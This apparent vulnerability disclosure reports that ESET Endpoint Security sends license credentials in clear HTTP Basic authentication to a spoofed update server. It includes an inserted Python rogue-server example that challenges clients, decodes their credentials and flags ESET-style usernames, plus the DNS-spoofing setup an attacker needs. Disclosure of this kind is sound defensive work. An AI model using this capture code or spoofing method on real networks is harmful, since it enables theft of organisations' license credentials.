ESET Endpoint Security credentials theft
The title should have been "Improper check of definition updates in ESET Endpoint Security leads to enterprise credentials theft", but that seemed a bit long, didn't it?
I first submitted what I believe to be a vulnerability to ESET in a confidential report, but eventually received an answer stating that it was not eligible for a bug bounty.
A vulnerability leveraging quite similar behaviour was reported back in 2016 in a different ESET product: https://www.cvedetails.com/cve/CVE-2016-9892/
The vulnerability reported here allows an attacker with a foothold in an organization using ESET to passively steal the ESET license as well as the ESET License Administrator credentials (https://ela.eset.com/LicenseOwner/Converter).
The test was conducted on a Windows 10 21H1 computer running ESET Endpoint Security 7.32.2041.0.
At the moment I have every reason to believe this behaviour can be reproduced against any version of ESET Endpoint Security.
During a security audit of an internal infrastructure, I was trying to hijack DNS traffic with a rogue IPv6 DNS server running alongside Responder, waiting for some employees to log in somewhere. What happened instead was that one instance of ESET Endpoint Security on the network tried to update its database by contacting pico.eset.com, and sent me plain-text credentials. The site seems to have an SSL certificate with an invalid Common Name (update.eset.com instead of pico.eset.com), which a properly validating client should reject when connecting to pico.eset.com.
Note in the meantime that this website also seems to be reachable over plain-text HTTP. I believe that to be an issue in itself.
For what follows, I have not been able to determine whether I captured the credentials because ESET connected to pico.eset.com on port 80, or because it tried port 443 without performing a TLS/SSL certificate check first, which would have let the MITM succeed. A capture filtered on the destination port would settle this.
When presented with an HTTP Basic authentication challenge by Responder following the IPv6 DNS spoofing, ESET sent the credentials in clear: a username of the form "EAV-XXXXXXXXXX" together with the password.
These credentials can be reused manually on the License Administrator URL available here: https://ela.eset.com/LicenseOwner/Converter, and licenses can then be generated. All the attack requires is:
- A computer on the same network as your target, on which you have administrator rights so you can run tools such as Responder or Wireshark
- Nothing else (although it is easier if your target responds to NetBIOS/LLMNR or has no static IPv6 DNS configured; otherwise a simple packet sniffer could do the job).
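To make the capture step concrete, here is an added example (not code from the original post, and not Responder itself) that plays the role of Responder's HTTP module: it answers every request with an HTTP Basic challenge, decodes the Authorization header the client sends back, and flags usernames that match the "EAV-XXXXXXXXXX" shape observed above. The request path, the password and the exact character set of the license username are constructed for the demo; only the EAV- prefix and the pico.eset.com Host header come from the post. The built-in client in `run_capture_demo` simulates a client that, like the ESET agent described above, happily answers the challenge over plain HTTP.

```python
"""Added example: a minimal rogue HTTP server that issues a Basic challenge
and logs the credentials a trusting client sends back (what Responder's HTTP
module does), plus a check for ESET-looking license usernames.
Hostnames, paths and sample credentials below are constructed for the demo."""
import base64
import re
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer

# Username shape reported in the post: "EAV-" followed by ten characters.
# The alphanumeric character set is an assumption, not taken from the post.
EAV_USER_RE = re.compile(r"^EAV-[0-9A-Za-z]{10}$")


def parse_basic_auth(header):
    """Return (user, password) from an 'Authorization: Basic <b64>' header,
    or None if the header is missing, not Basic, or not valid base64/UTF-8."""
    if not header:
        return None
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    user, sep, password = decoded.partition(":")
    if not sep:
        return None
    return user, password


def looks_like_eset_license(user):
    """True if the captured username has the EAV-XXXXXXXXXX shape."""
    return bool(EAV_USER_RE.match(user))


class CaptureHandler(BaseHTTPRequestHandler):
    captured = []  # (host, path, user, password) for every credentialed request

    def do_GET(self):
        creds = parse_basic_auth(self.headers.get("Authorization"))
        if creds is None:
            # Step 1: no credentials yet, so challenge the client.
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="update"')
            self.end_headers()
            return
        # Step 2: the client retried with credentials; record them and answer
        # 200 so it stops retrying.
        CaptureHandler.captured.append((self.headers.get("Host"), self.path) + creds)
        self.send_response(200)
        self.end_headers()

    do_POST = do_GET  # an update client may POST; treat it the same way

    def log_message(self, *args):  # keep the demo quiet
        pass


def run_capture_demo():
    """Start the rogue server on localhost, act as a client that answers the
    challenge, and return the credentials the server captured."""
    CaptureHandler.captured = []
    server = HTTPServer(("127.0.0.1", 0), CaptureHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        conn = HTTPConnection("127.0.0.1", server.server_port, timeout=5)
        # Constructed client: first request carries no credentials.
        conn.request("GET", "/update.ver", headers={"Host": "pico.eset.com"})
        first = conn.getresponse()
        first.read()
        if first.status != 401:
            raise RuntimeError("expected a Basic challenge")
        # ... then it retries with Basic auth. Sample credentials are made up.
        token = base64.b64encode(b"EAV-0123456789:s3cret").decode()
        conn.request("GET", "/update.ver",
                     headers={"Host": "pico.eset.com", "Authorization": "Basic " + token})
        conn.getresponse().read()
        conn.close()
    finally:
        server.shutdown()
        server.server_close()
    return list(CaptureHandler.captured)


if __name__ == "__main__":
    for host, path, user, password in run_capture_demo():
        tag = " <- looks like an ESET license" if looks_like_eset_license(user) else ""
        print(f"{host}{path} {user}:{password}{tag}")
```

On a real engagement the only thing that changes is who connects: the spoofed DNS answer steers the victim to the listener, and a client that falls back to plain HTTP, or skips certificate validation, reveals its credentials in exactly this two-step exchange. A client that insists on TLS and validates the certificate never gets past the handshake, which is the distinction the paragraph above could not settle.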
The target (individual or company) gets its licensing information stolen and the attacker can issue licenses for himself. Perhaps there are other uses for the credentials that I have not identified yet. There is no impact for ESET as a company, only for its customers: additional license costs, or license expiration through over-usage.
Definitely not rocket science…